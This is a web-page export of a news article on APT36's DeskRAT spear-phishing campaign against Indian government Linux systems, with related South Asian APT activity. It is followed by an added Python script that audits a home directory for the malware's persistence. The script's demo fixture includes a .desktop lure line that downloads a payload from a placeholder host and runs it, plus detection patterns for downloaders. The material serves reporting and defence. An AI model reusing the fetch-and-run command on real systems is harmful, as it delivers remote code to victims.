{"id":30974,"date":"2025-10-27T00:55:55","date_gmt":"2025-10-27T00:55:55","guid":{"rendered":"https:\/\/fusionmindlabs.com\/blogs\/apt36-hits-india-with-golang-malware\/"},"modified":"2025-10-27T00:55:58","modified_gmt":"2025-10-27T00:55:58","slug":"apt36-hits-india-with-golang-malware","status":"publish","type":"post","link":"https:\/\/fusionmindlabs.com\/blogs\/apt36-hits-india-with-golang-malware\/","title":{"rendered":"APT36 Hits India with Golang Malware"},"content":{"rendered":"<div>\n<p><span class=\"p-author\"><i class=\"icon-font icon-calendar\"><\/i><span class=\"author\">Oct 24, 2025<\/span><i class=\"icon-font icon-user\"><\/i><span class=\"author\">Ravie Lakshmanan<\/span><\/span><span class=\"p-tags\">Cyber Espionage \/ Malware<\/span><\/p>\n<\/div>\n<div id=\"articlebody\">\n<p>A threat actor with ties to Pakistan has been identified as targeting Indian government entities through spear-phishing attacks, with the ultimate goal of delivering a Golang-based malware known as <strong>DeskRAT<\/strong>.<\/p>\n<p>The activity, <a href=\"https:\/\/blog.sekoia.io\/transparenttribe-targets-indian-military-organisations-with-deskrat\/\" rel=\"noopener nofollow\" target=\"_blank\">observed<\/a> in August and September 2025 by Sekoia, has been attributed to <a href=\"https:\/\/www.seqrite.com\/blog\/umbrella-of-pakistani-threats-converging-tactics-of-cyber-operations-targeting-india\/\" rel=\"noopener nofollow\" target=\"_blank\">Transparent Tribe<\/a> (also 
known as APT36), a state-sponsored hacking group that has been active since at least 2013. This campaign builds upon a prior one <a href=\"https:\/\/thehackernews.com\/2025\/08\/transparent-tribe-targets-indian-govt.html\" rel=\"noopener nofollow\" target=\"_blank\">disclosed<\/a> by CYFIRMA in August 2025.<\/p>\n<p>The attack chains involve sending phishing emails that contain a ZIP file attachment or a link to an archive hosted on legitimate cloud services like Google Drive. The ZIP file contains a malicious Desktop file that embeds commands to display a decoy PDF (&#8220;CDS_Directive_Armed_Forces.pdf&#8221;) using Mozilla Firefox, while simultaneously executing the main payload.<\/p>\n<p>Both artifacts, the decoy PDF and the payload, are fetched from an external server &#8220;modgovindia[.]com&#8221; and launched. The campaign is designed to target BOSS (Bharat Operating System Solutions) Linux systems, with the remote access trojan capable of establishing command-and-control (C2) using WebSockets.<\/p>\n<p>The malware supports four different methods for persistence: creating a systemd service, setting up a cron job, adding the malware to the Linux autostart directory (&#8220;$HOME\/.config\/autostart&#8221;), and configuring .bashrc to launch the trojan by means of a shell script written to the &#8220;$HOME\/.config\/system-backup\/&#8221; directory.<\/p>\n<p>DeskRAT supports five 
different commands &#8211;<\/p>\n<ul>\n<li><strong>ping<\/strong>, to reply to the C2 server with a JSON message containing &#8220;pong&#8221; and the current timestamp<\/li>\n<li><strong>heartbeat<\/strong>, to send a JSON message containing heartbeat_response and a timestamp<\/li>\n<li><strong>browse_files<\/strong>, to send directory listings<\/li>\n<li><strong>start_collection<\/strong>, to search for and send files that match a predefined set of extensions and are smaller than 100 MB<\/li>\n<li><strong>upload_execute<\/strong>, to drop an additional Python, shell, or desktop payload and execute it<\/li>\n<\/ul>\n<p>&#8220;DeskRAT&#8217;s C2 servers are named as stealth servers,&#8221; the French cybersecurity company said. &#8220;In this context, a stealth server refers to a name server that does not appear in any publicly visible NS records for the associated domain.&#8221;<\/p>\n<p>&#8220;While the initial campaigns leveraged legitimate cloud storage platforms such as Google Drive to distribute malicious payloads, TransparentTribe has now transitioned to using dedicated staging servers.&#8221;<\/p>\n<p>The findings follow a report from QiAnXin XLab, which <a href=\"https:\/\/blog.xlab.qianxin.com\/apt-stealthserver-en\/\" rel=\"noopener nofollow\" target=\"_blank\">detailed<\/a> the campaign&#8217;s targeting of Windows endpoints with a Golang backdoor it tracks as StealthServer through phishing emails containing booby-trapped Desktop file attachments, suggesting a cross-platform focus.<\/p>\n<p>It&#8217;s worth noting that StealthServer for Windows comes in three variants &#8211;<\/p>\n<ul>\n<li><strong>StealthServer Windows-V1<\/strong> (Observed in July 2025), which employs several anti-analysis and anti-debug techniques to avoid detection; establishes persistence using scheduled tasks, a PowerShell script added to the Windows Startup folder, and Windows Registry changes; and uses TCP to communicate with the C2 server in order to 
enumerate files and upload\/download specific files<\/li>\n<li><strong>StealthServer Windows-V2<\/strong> (Observed in late August 2025), which adds new anti\u2011debug checks for tools like OllyDbg, x64dbg, and IDA, while keeping the functionality intact<\/li>\n<li><strong>StealthServer Windows-V3<\/strong> (Observed in late August 2025), which uses WebSocket for communication and has the same functionality as DeskRAT<\/li>\n<\/ul>\n<p>XLab said it also observed two Linux variants of StealthServer, one of which is DeskRAT with support for an extra command called &#8220;welcome.&#8221; The second Linux version, on the other hand, uses HTTP for C2 communications instead of WebSocket. It features three commands &#8211;<\/p>\n<ul>\n<li><strong>browse<\/strong>, to enumerate files under a specified directory<\/li>\n<li><strong>upload<\/strong>, to upload a specified file<\/li>\n<li><strong>execute<\/strong>, to execute a bash command<\/li>\n<\/ul>\n<p>It also recursively searches for files matching a set of extensions, starting from the root directory (&#8220;\/&#8221;), and transmits each one as it is found, in encrypted form, via an HTTP POST request to &#8220;modgovindia[.]space:4000.&#8221; This indicates the Linux variant could have been an earlier iteration of DeskRAT, since the latter features a dedicated &#8220;start_collection&#8221; command to exfiltrate files.<\/p>\n<div class=\"separator\" style=\"clear: both;\"><a href=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhvp49_0xvXhcOVzGvyhJruZ71GEcN9U6jza3QIZ1f4jtEs4U5IduXY6pep-PwqSusrwk5YHKTdA5Xx5KjiE-6OOlUWOquGREnf0nQCGzQiMxACCVG0cJC9831ORGDapX2dVmurO3fCEFUCnhBPmGKspByXHMgxpruChsBtTjCVf_YeIriwiShO7pBeZgE9\/s790-rw-e365\/deskrat.png\" style=\"clear: left; display: block; float: left;  text-align: center;\" rel=\"nofollow noopener\" target=\"_blank\"><img decoding=\"async\" 
src=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhvp49_0xvXhcOVzGvyhJruZ71GEcN9U6jza3QIZ1f4jtEs4U5IduXY6pep-PwqSusrwk5YHKTdA5Xx5KjiE-6OOlUWOquGREnf0nQCGzQiMxACCVG0cJC9831ORGDapX2dVmurO3fCEFUCnhBPmGKspByXHMgxpruChsBtTjCVf_YeIriwiShO7pBeZgE9\/s790-rw-e365\/deskrat.png\" alt=\"\" border=\"0\" data-original-height=\"1616\" data-original-width=\"2048\"\/><\/a><\/div>\n<p>&#8220;The group&#8217;s operations are frequent and characterized by a wide variety of tools, numerous variants, and a high delivery cadence,&#8221; QiAnXin XLab said.<\/p>\n<h2 style=\"text-align: left;\">Attacks from Other South and East Asian Threat Clusters<\/h2>\n<p>Recent weeks have seen the discovery of various campaigns orchestrated by South Asia-focused threat actors &#8211;<\/p>\n<ul>\n<li>A <a href=\"https:\/\/ti.qianxin.com\/blog\/articles\/bitter-uses-diverse-means-to-deliver-new-backdoor-components-en\/\" rel=\"noopener nofollow\" target=\"_blank\">phishing campaign<\/a> undertaken by <a href=\"https:\/\/thehackernews.com\/2025\/06\/bitter-hacker-group-expands-cyber.html\" rel=\"noopener nofollow\" target=\"_blank\">Bitter APT<\/a> targeting government, electric power, and military sectors in China and Pakistan with malicious Microsoft Excel attachments or RAR archives that exploit <a href=\"https:\/\/thehackernews.com\/2025\/08\/winrar-zero-day-under-active.html\" rel=\"noopener nofollow\" target=\"_blank\">CVE-2025-8088<\/a> to ultimately drop a C# implant named &#8220;cayote.log&#8221; that can gather system information and run arbitrary executables received from an attacker-controlled server.<\/li>\n<li>A <a href=\"https:\/\/hunt.io\/blog\/operation-southnet-sidewinder-south-asia-maritime-phishing\" rel=\"noopener nofollow\" target=\"_blank\">new wave of targeted activity<\/a> undertaken by <a href=\"https:\/\/thehackernews.com\/2025\/05\/south-asian-ministries-hit-by.html\" rel=\"noopener nofollow\" target=\"_blank\">SideWinder<\/a> <a 
href=\"https:\/\/hunt.io\/blog\/apt-sidewinder-netlify-government-phishing\" rel=\"noopener nofollow\" target=\"_blank\">targeting<\/a> the maritime sector and other verticals in Pakistan, Sri Lanka, Bangladesh, Nepal, and Myanmar with credential-harvesting portals and weaponized lure documents that deliver multi-platform malware as part of a &#8220;concentrated&#8221; campaign codenamed Operation SouthNet.<\/li>\n<li>An <a href=\"https:\/\/mp.weixin.qq.com\/s\/rW_xSgKlV6r0_JXIjr97Rg\" rel=\"noopener nofollow\" target=\"_blank\">attack<\/a> <a href=\"https:\/\/mp.weixin.qq.com\/s?__biz=MzUyMjk4NzExMA==&amp;mid=2247507399&amp;idx=1&amp;sn=01bd1443bd6fd0c238014d2246c34039&amp;chksm=f9c1eececeb667d81092f39b7b62807e1617b4629ce3364e427c6112f4300a932a2739a33e58&amp;scene=178&amp;cur_album_id=1955835290309230595&amp;search_click_id=#rd\" rel=\"noopener nofollow\" target=\"_blank\">campaign<\/a> undertaken by a Vietnam-aligned hacking group known as <a href=\"https:\/\/thehackernews.com\/2024\/08\/vietnamese-human-rights-group-targeted.html\" rel=\"noopener nofollow\" target=\"_blank\">OceanLotus<\/a> (aka APT-Q-31) that delivers the <a href=\"https:\/\/thehackernews.com\/2023\/02\/threat-actors-adopt-havoc-framework-for.html\" rel=\"noopener nofollow\" target=\"_blank\">Havoc<\/a> post-exploitation framework in attacks targeting enterprises and government departments in China and neighboring Southeast Asian countries.<\/li>\n<li>An <a href=\"https:\/\/securelist.com\/mysterious-elephant-apt-ttps-and-tools\/117596\/\" rel=\"noopener nofollow\" target=\"_blank\">attack campaign<\/a> undertaken by <a href=\"https:\/\/thehackernews.com\/2024\/11\/apt-k-47-uses-hajj-themed-lures-to.html\" rel=\"noopener nofollow\" target=\"_blank\">Mysterious Elephant<\/a> (aka APT-K-47) in early 2025 that uses a combination of exploit kits, phishing emails, and malicious documents to gain initial access to target government entities and foreign affairs sectors in Pakistan, Afghanistan, 
Bangladesh, Nepal, India, and Sri Lanka using a PowerShell script that drops BabShell (a C++ reverse shell), which then launches MemLoader HidenDesk (a loader that executes a Remcos RAT payload in memory) and MemLoader Edge (another malicious loader that embeds VRat, a variant of the open-source RAT vxRat).<\/li>\n<\/ul>\n<p>Notably, these intrusions have also focused on exfiltrating WhatsApp communications from compromised hosts using a number of modules \u2013 viz., Uplo Exfiltrator and Stom Exfiltrator \u2013 that are devoted to capturing various files exchanged through the popular messaging platform.<\/p>\n<p>Another tool used by the threat actor is ChromeStealer Exfiltrator, which, as the name implies, is capable of harvesting cookies, tokens, and other sensitive information from Google Chrome, as well as siphoning files related to WhatsApp.<\/p>\n<p>The disclosure paints a picture of a hacking group that has evolved beyond relying on tools from other threat actors into a sophisticated threat operation, wielding its own arsenal of custom malware. 
The adversary is known to share tactical overlaps with <a href=\"https:\/\/thehackernews.com\/2025\/07\/donot-apt-expands-operations-targets.html\" rel=\"noopener nofollow\" target=\"_blank\">Origami Elephant<\/a>, <a href=\"https:\/\/thehackernews.com\/2025\/10\/confucius-hackers-hit-pakistan-with-new.html\" rel=\"noopener nofollow\" target=\"_blank\">Confucius<\/a>, and SideWinder, all of which are assessed to be operating with Indian interests in mind.<\/p>\n<p>&#8220;Mysterious Elephant is a highly sophisticated and active Advanced Persistent Threat group that poses a significant threat to government entities and foreign affairs sectors in the Asia-Pacific region,&#8221; Kaspersky said. &#8220;The use of custom-made and open-source tools, such as BabShell and MemLoader, highlights their technical expertise and willingness to invest in developing advanced malware.&#8221;<\/p>\n<\/div>\n<p><a href=\"https:\/\/thehackernews.com\/2025\/10\/apt36-targets-indian-government-with.html\" rel=\"nofollow noopener\" target=\"_blank\">Source Link<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Oct 24, 2025 Ravie Lakshmanan Cyber Espionage \/ Malware A threat actor with ties to Pakistan has been identified as targeting Indian government entities through spear-phishing attacks, with the ultimate 
goal&#8230;<\/p>\n","protected":false},"author":19,"featured_media":30975,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[22],"tags":[46,39,32,31,33,34,35,40,36,37,42,44,43,41,38,45],"class_list":{"0":"post-30974","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-cybersecurity","8":"tag-computer-security","9":"tag-cyber-attacks","10":"tag-cyber-news","11":"tag-cyber-security-news","12":"tag-cyber-security-news-today","13":"tag-cyber-security-updates","14":"tag-cyber-updates","15":"tag-data-breach","16":"tag-hacker-news","17":"tag-hacking-news","18":"tag-how-to-hack","19":"tag-information-security","20":"tag-network-security","21":"tag-ransomware-malware","22":"tag-software-vulnerability","23":"tag-the-hacker-news"},"jetpack_featured_media_url":"https:\/\/fusionmindlabs.com\/blogs\/wp-content\/uploads\/sites\/9\/2025\/10\/indian-cyberattack.jpg","_links":{"self":[{"href":"https:\/\/fusionmindlabs.com\/blogs\/wp-json\/wp\/v2\/posts\/30974","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/fusionmindlabs.com\/blogs\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/fusionmindlabs.com\/blogs\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/fusionmindlabs.com\/blogs\/wp-json\/wp\/v2\/users\/19"}],"replies":[{"embeddable":true,"href":"https:\/\/fusionmindlabs.com\/blogs\/wp-json\/wp\/v2\/comments?post=30974"}],"version-history":[{"count":1,"href":"https:\/\/fusionmindlabs.com\/blogs\/wp-json\/wp\/v2\/posts\/30974\/revisions"}],"predecessor-version":[{"id":30976,"href":"https:\/\/fusionmindlabs.com\/blogs\/wp-json\/wp\/v2\/posts\/30974\/revisions\/30976"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/fusionmindlabs.com\/blogs\/wp-json\/wp\/v2\/media\/30975"}],"wp:attachment":[{"href":"https:\/\/fusionmindlabs.com\/blogs\/wp-json\/wp\/v2\/media?parent=30974"}],"wp:term
":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/fusionmindlabs.com\/blogs\/wp-json\/wp\/v2\/categories?post=30974"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/fusionmindlabs.com\/blogs\/wp-json\/wp\/v2\/tags?post=30974"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
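The article above names four persistence mechanisms for DeskRAT on a BOSS Linux host (a systemd service, a cron job, a `$HOME/.config/autostart` entry, and a `.bashrc` hook that runs a script dropped under `$HOME/.config/system-backup/`) and describes a `.desktop` lure whose Exec line opens a decoy PDF in Firefox while launching the payload. The following host-audit script is an added example for this page, not code from Sekoia, XLab, The Hacker News or the malware itself: it walks those four locations and every `.desktop` file under a home directory and reports lines that reference the staging directory or chain a downloader with a second command. The systemd user-unit path, the Exec heuristics, the `staging.invalid` host and everything produced by `build_demo_home()` are assumptions constructed here for illustration, not indicators taken from the report.

```python
"""Audit a Linux home directory for DeskRAT-style persistence and .desktop lures.

Added example, not code from the reports cited above. The staging directory and
autostart directory are the paths named in the article; the systemd user-unit
path, the Exec heuristics and the demo home are assumptions made here.
"""
import re
import shutil
import tempfile
from pathlib import Path

SUSPECT_DIR = ".config/system-backup"      # staging dir named in the report
AUTOSTART_DIR = ".config/autostart"        # autostart dir named in the report
SYSTEMD_USER_DIR = ".config/systemd/user"  # assumed: default user-unit location

# Assumed heuristics: a document launcher has no reason to spawn a shell,
# chain several commands, or fetch something from the network in its Exec= line.
CHAINED_RE = re.compile(r"(?:^|\s)(?:sh|bash)\s+-c\b|&&|;|\|\|")
FETCH_RE = re.compile(r"\b(?:curl|wget)\b")


def desktop_exec_lines(text: str) -> list:
    """Return every Exec= value in a .desktop file (actions may add more than one)."""
    return [line.split("=", 1)[1].strip()
            for line in text.splitlines() if line.startswith("Exec=")]


def suspicious_exec(cmd: str) -> bool:
    """True if an Exec command spawns a shell, chains commands, downloads,
    or touches the staging directory."""
    return bool(CHAINED_RE.search(cmd) or FETCH_RE.search(cmd) or SUSPECT_DIR in cmd)


def audit_home(home: Path, crontab_text: str = "") -> list:
    """Return findings as {"where": location, "what": offending line} dicts.
    crontab_text is the output of `crontab -l`, supplied by the caller so the
    function itself never shells out and stays testable offline."""
    findings = []

    # 1. .bashrc launching a script kept under ~/.config/system-backup/
    bashrc = home / ".bashrc"
    if bashrc.is_file():
        for n, line in enumerate(bashrc.read_text(errors="replace").splitlines(), 1):
            if SUSPECT_DIR in line:
                findings.append({"where": f".bashrc:{n}", "what": line.strip()})

    # 2. autostart entries, plus any other .desktop file such as an extracted lure
    for desktop in sorted(home.rglob("*.desktop")):
        rel = desktop.relative_to(home).as_posix()
        kind = "autostart" if rel.startswith(AUTOSTART_DIR + "/") else "desktop-lure"
        for cmd in desktop_exec_lines(desktop.read_text(errors="replace")):
            if suspicious_exec(cmd):
                findings.append({"where": f"{kind}:{rel}", "what": cmd})

    # 3. cron entries that run something from the staging directory or fetch code
    for n, line in enumerate(crontab_text.splitlines(), 1):
        if line.strip() and not line.lstrip().startswith("#") and (
                SUSPECT_DIR in line or FETCH_RE.search(line)):
            findings.append({"where": f"crontab:{n}", "what": line.strip()})

    # 4. systemd user units whose ExecStart points into the staging directory
    unit_dir = home / SYSTEMD_USER_DIR
    if unit_dir.is_dir():
        for unit in sorted(unit_dir.glob("*.service")):
            for line in unit.read_text(errors="replace").splitlines():
                if line.startswith("ExecStart=") and SUSPECT_DIR in line:
                    findings.append({"where": f"systemd:{unit.name}", "what": line})
    return findings


def build_demo_home() -> tuple:
    """Constructed sample home directory: fake paths and hosts, not real IOCs."""
    home = Path(tempfile.mkdtemp(prefix="deskrat-demo-"))
    (home / SUSPECT_DIR).mkdir(parents=True)
    (home / SUSPECT_DIR / "backup.sh").write_text("#!/bin/sh\nexec \"$HOME/.local/svc\"\n")
    (home / ".bashrc").write_text(
        "export PATH=\"$PATH:$HOME/bin\"\n"
        "bash \"$HOME/.config/system-backup/backup.sh\" >/dev/null 2>&1 &\n")
    (home / AUTOSTART_DIR).mkdir(parents=True)
    (home / AUTOSTART_DIR / "update.desktop").write_text(
        "[Desktop Entry]\nType=Application\nName=Update\n"
        "Exec=bash $HOME/.config/system-backup/backup.sh\n")
    (home / AUTOSTART_DIR / "nm-applet.desktop").write_text(   # benign control entry
        "[Desktop Entry]\nType=Application\nName=Network\nExec=nm-applet\n")
    (home / "Downloads").mkdir()
    (home / "Downloads" / "CDS_Directive.desktop").write_text(  # lure: decoy + payload
        "[Desktop Entry]\nType=Application\nName=CDS_Directive.pdf\n"
        "Exec=sh -c \"curl -s http://staging.invalid/d.pdf -o /tmp/d.pdf && "
        "firefox /tmp/d.pdf; curl -s http://staging.invalid/p -o /tmp/p && /tmp/p\"\n")
    (home / SYSTEMD_USER_DIR).mkdir(parents=True)
    (home / SYSTEMD_USER_DIR / "backup.service").write_text(
        "[Service]\nExecStart=/bin/bash %h/.config/system-backup/backup.sh\n"
        "[Install]\nWantedBy=default.target\n")
    crontab = "# m h dom mon dow command\n*/5 * * * * $HOME/.config/system-backup/backup.sh\n"
    return home, crontab


def run_demo() -> list:
    """Build the sample home, audit it, remove it, and return the findings."""
    home, crontab = build_demo_home()
    try:
        return audit_home(home, crontab)
    finally:
        shutil.rmtree(home, ignore_errors=True)


if __name__ == "__main__":
    for f in run_demo():
        print(f"{f['where']:45} {f['what']}")
```

On a real host, call `audit_home(Path.home(), subprocess.run(["crontab", "-l"], capture_output=True, text=True).stdout)` for each user, and remember that the report also describes a system-level systemd service and cron job, so `/etc/systemd/system`, `/etc/cron.d` and root's crontab deserve the same string checks. The `.desktop` heuristic will also flag legitimate launchers that use `sh -c`, so treat hits as review candidates rather than verdicts.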